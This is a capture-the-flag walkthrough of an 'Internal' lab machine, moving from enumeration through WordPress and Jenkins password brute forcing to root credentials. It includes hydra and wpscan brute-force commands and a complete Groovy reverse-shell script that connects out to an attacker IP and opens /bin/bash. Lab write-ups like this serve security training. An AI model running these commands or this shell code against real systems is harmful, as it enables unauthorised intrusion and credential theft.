Internal THM{}
80(Wordpress)
First we edit the /etc/hosts file to add internal.thm
Nmap
nmap -A -T4 -p- -sC 10.10.221.255
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web
Gobuster
gobuster dir -u http://internal.thm/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
/blog (Status: 301) [Size: 311] [--> http://internal.thm/blog/]
/wordpress (Status: 301) [Size: 316] [--> http://internal.thm/wordpress/]
/javascript (Status: 301) [Size: 317] [--> http://internal.thm/javascript/]
/phpmyadmin (Status: 301) [Size: 317] [--> http://internal.thm/phpmyadmin/]
Gobuster /blog
/wp-content (Status: 301) [Size: 322] [--> http://internal.thm/blog/wp-content/]
/wp-includes (Status: 301) [Size: 323] [--> http://internal.thm/blog/wp-includes/]
/wp-admin (Status: 301) [Size: 320] [--> http://internal.thm/blog/wp-admin/]
Gobuster /wordpress
/wp-content WHITE BACKGROUND (Status: 301) [Size: 327] [--> http://internal.thm/wordpress/wp-content/]
/wp-includes FORBIDDEN (Status: 301) [Size: 328] [--> http://internal.thm/wordpress/wp-includes/]
/wp-admin WORDPRESS LOGIN (Status: 301) [Size: 325] [--> http://internal.thm/wordpress/wp-admin/]
Gobuster /javascript
/prototype FORBIDDEN (Status: 301) [Size: 327] [--> http://internal.thm/javascript/prototype/]
/scriptaculous FORBIDDEN (Status: 301) [Size: 331] [--> http://internal.thm/javascript/scriptaculous/]
/jquery FORBIDDEN (Status: 301) [Size: 324] [--> http://internal.thm/javascript/jquery/]
Gobuster /phpmyadmin
/templates FORBIDDEN (Status: 403) [Size: 277]
/themes FORBIDDEN (Status: 301) [Size: 324] [--> http://internal.thm/phpmyadmin/themes/]
/doc FORBIDDEN (Status: 301) [Size: 321] [--> http://internal.thm/phpmyadmin/doc/]
/js FORBIDDEN (Status: 301) [Size: 320] [--> http://internal.thm/phpmyadmin/js/]
/libraries FORBIDDEN (Status: 403) [Size: 277]
/setup LOGIN PAGE, INTERESTING
/sql FORBIDDEN (Status: 301) [Size: 321] [--> http://internal.thm/phpmyadmin/sql/]
/locale FORBIDDEN (Status: 301) [Size: 324] [--> http://internal.thm/phpmyadmin/locale/]
/setup
Tried hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz internal.thm http-get /phpmyadmin/setup but obtained nothing
Nikto
nikto -h internal.thm
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5abef58e962a5, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ Cookie wordpress_test_cookie created without the httponly flag
+ /blog/wp-login.php: Wordpress login found
wpscan
Because we know that the server is running Worpress, we can use wpscan to obtain more information.
wpscan --url http://internal.thm/blog -e u
+] admin
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
Basically, we find the user admin. With the use of wpscan we can try to bruteforce the user admin.
wpscan --url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / my2boys
Trying admin / bratz1 Time: 00:03:06 < > (3885 / 14348277) 0.02% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: my2boys
And that's our password.
After investigating a bit, we find this information in a post inside wordpress admin account:
Don't forget to reset Will's credentials. william:arnold147
Wordpress
Now that we have access to wordpress with an admin account, we can establish a reverse shell.
For that we use the information provided in this web: https://www.hacknos.com/wordpress-shell-upload/ using the 404.php method.
For the reverse shell, we use the pentestmonkey php reverse shell: https://github.com/pentestmonkey/php-reverse-shell and nc -lvnp 5555on our machine.
Shell
We can upload our shell using this info: https://www.metahackers.pro/upgrade-shell-to-fully-interactive-tty-shell/ We find on /opt this information:
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna:bubb13guM!@#123
And can open the first flag on home directory. We also find this information on a file in /home directory:
Internal Jenkins service is running on 172.17.0.2:8080
We can access the Jenkins portal by making a tunnel and redirecting Jenkin’s Portal running on port 8080 on to our attacking kali machine. To access it we are going to use SSH tunneling technique to forward Jenkins ip:port to our attacker machine’s ip:port. From attackers (kali linux) terminal execute below command and type the password which we retrieved from wp-save.txt file.
ssh -L 6767:172.17.0.2:8080 aubreanna@internal.thm
To access Jenkins, type localhost:6767 in your browser from the local machine.
Jenkins
Because we can't connect with any found credentials, we choose bruteforce with hydra.
For that, is important to use the IP and port correctly
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 6767 http-post-form '/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password'
And that is the result
[6767][http-post-form] host: 127.0.0.1 login: admin password: spongebob
After finding in google, we discover that can obtain a reverse shell using the Groovy Script Console
nc -lvnp 5555 on our local machine and after we execute this code in jenkins
String host="10.11.62.63";
int port=5555;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Know we have a reverse shell. And because we can't find anything interesting with linpeas.sh, we do it manually:
jenkins@jenkins:/$ find / -name *.txt
/opt/note.txt
jenkins@jenkins:/opt$ cat note.txt
Aubreanna,
Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you
need access to the root user account.
root:tr0ub13guM!@#123